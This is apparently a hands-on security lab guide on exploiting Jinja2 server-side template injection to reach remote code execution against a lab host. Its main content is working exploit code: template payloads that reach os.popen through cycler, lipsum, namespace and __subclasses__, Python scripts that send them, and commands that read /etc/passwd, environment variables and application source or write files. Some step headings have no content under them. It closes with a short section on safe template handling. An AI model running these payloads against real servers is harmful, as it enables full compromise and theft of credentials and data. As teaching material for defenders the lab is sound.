Exploit Jinja2 Server-Side Template Injection vulnerabilities to achieve Remote Code Execution from Kali Linux:
Detect SSTI with mathematical probes ({{7*7}} → 49)
Escalate to arbitrary Python evaluation via cycler.__init__.__globals__
Execute OS commands: id, cat /etc/passwd, env
Chain SSTI → RCE → full server compromise
Background
SSTI occurs when user input is embedded in a template and evaluated by the template engine. Unlike XSS (client-side execution), SSTI executes on the server with the web process's privileges.
Real-world examples:
2016 Uber — SSTI in a marketing email template editor; researcher achieved RCE by injecting {{7*7}} in the subject line of a test campaign. Paid $10,000 bug bounty.
2019 HackerOne platform — SSTI in a custom Markdown processor rendered Python expressions; security researcher achieved file read on production servers.
Pebble/FreeMarker/Velocity/Twig — every major template engine has been exploited via SSTI when templates are constructed from user input.
OWASP: A03:2021 Injection
Architecture
Time
45 minutes
Lab Instructions
Step 1: Setup
Step 2: Launch Kali and Detect SSTI
📸 Verified Output:
Step 3: Read Server Config and Globals
Step 4: SSTI → RCE via cycler
📸 Verified Output:
💡 cycler is a Jinja2 built-in helper object. Its __init__.__globals__ gives us the Python module's global namespace, which includes os. From os, we call popen() to spawn a shell. This works because Jinja2 templates run in the same Python process as the web server — they have full access to the Python runtime.
python3 << 'EOF'
import urllib.request, json
T = "http://victim-adv02:5000"
def post(data):
req = urllib.request.Request(f"{T}/api/email/preview",
data=json.dumps(data).encode(), headers={"Content-Type":"application/json"})
return json.loads(urllib.request.urlopen(req).read())
# Inject SSTI in the template field of a POST body
templates = [
"Dear {{ name }}, your order is confirmed.", # normal
"{{cycler.__init__.__globals__.os.popen('id').read()}}", # RCE
"{% for f in cycler.__init__.__globals__.os.listdir('/app') %}{{f}} {% endfor %}", # list files
]
for tmpl in templates:
r = post({"template": tmpl, "name": "Alice"})
print(f"template: {tmpl[:50]}")
print(f"result: {r.get('preview', r.get('error',''))[:150]}")
print()
EOF
template: Dear {{ name }}, your order is confirmed.
result: Dear Alice, your order is confirmed.
template: {{cycler.__init__.__globals__.os.popen('id').read()}}
result: uid=0(root) gid=0(root) groups=0(root)
python3 << 'EOF'
import urllib.request, urllib.parse, json
T = "http://victim-adv02:5000"
def render(tmpl):
url = T + "/api/render?template=" + urllib.parse.quote(tmpl)
return json.loads(urllib.request.urlopen(url).read()).get('rendered', '')
# Via __subclasses__() — finding subprocess.Popen
alt_payloads = [
# Warning class path
"{% for x in ().__class__.__base__.__subclasses__() %}{% if 'warning' in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen('id').read()}}{% endif %}{% endfor %}",
# Lipsum function
"{{lipsum.__globals__['os'].popen('id').read()}}",
# namespace object
"{{namespace.__init__.__globals__['os'].popen('id').read()}}",
]
for i, p in enumerate(alt_payloads, 1):
result = render(p).strip()
print(f"[Payload {i}]: {result[:80] if result else 'failed'}")
EOF
python3 << 'EOF'
import urllib.request, urllib.parse, json
T = "http://victim-adv02:5000"
# Write a backdoor script to disk (demonstrates persistence)
write_backdoor = "{{cycler.__init__.__globals__.os.popen('echo pwned > /tmp/ssti_proof.txt').read()}}"
url = T + "/api/render?template=" + urllib.parse.quote(write_backdoor)
json.loads(urllib.request.urlopen(url).read())
# Verify file was written
verify = "{{cycler.__init__.__globals__.os.popen('cat /tmp/ssti_proof.txt').read()}}"
url2 = T + "/api/render?template=" + urllib.parse.quote(verify)
r = json.loads(urllib.request.urlopen(url2).read())
print(f"File write confirmed: {r.get('rendered','').strip()}")
# Read the application source code
read_src = "{{cycler.__init__.__globals__.os.popen('cat /app/victim.py').read()}}"
url3 = T + "/api/render?template=" + urllib.parse.quote(read_src)
r2 = json.loads(urllib.request.urlopen(url3).read())
print(f"\nSource code (first 300 chars):\n{r2.get('rendered','')[:300]}")
EOF
# VULNERABLE: render user-supplied string as template
result = Environment(loader=BaseLoader()).from_string(user_input).render()
# SAFE option 1: treat user input as data, not template
template = Environment(loader=BaseLoader()).from_string("Hello, {{ name }}!")
result = template.render(name=user_input) # user_input is a variable value, not template code
# SAFE option 2: use sandbox environment
from jinja2.sandbox import SandboxedEnvironment
env = SandboxedEnvironment()
result = env.from_string(user_input).render() # raises SecurityError on dangerous access
# SAFE option 3: allowlist template variables, never render user-supplied templates
ALLOWED_TEMPLATES = {'welcome': 'Dear {{ name }}, welcome!', 'order': 'Order {{ id }} confirmed.'}
tmpl_key = user_supplied_key # user picks a key, not the template itself
result = Environment(loader=BaseLoader()).from_string(ALLOWED_TEMPLATES[tmpl_key]).render(name=name)
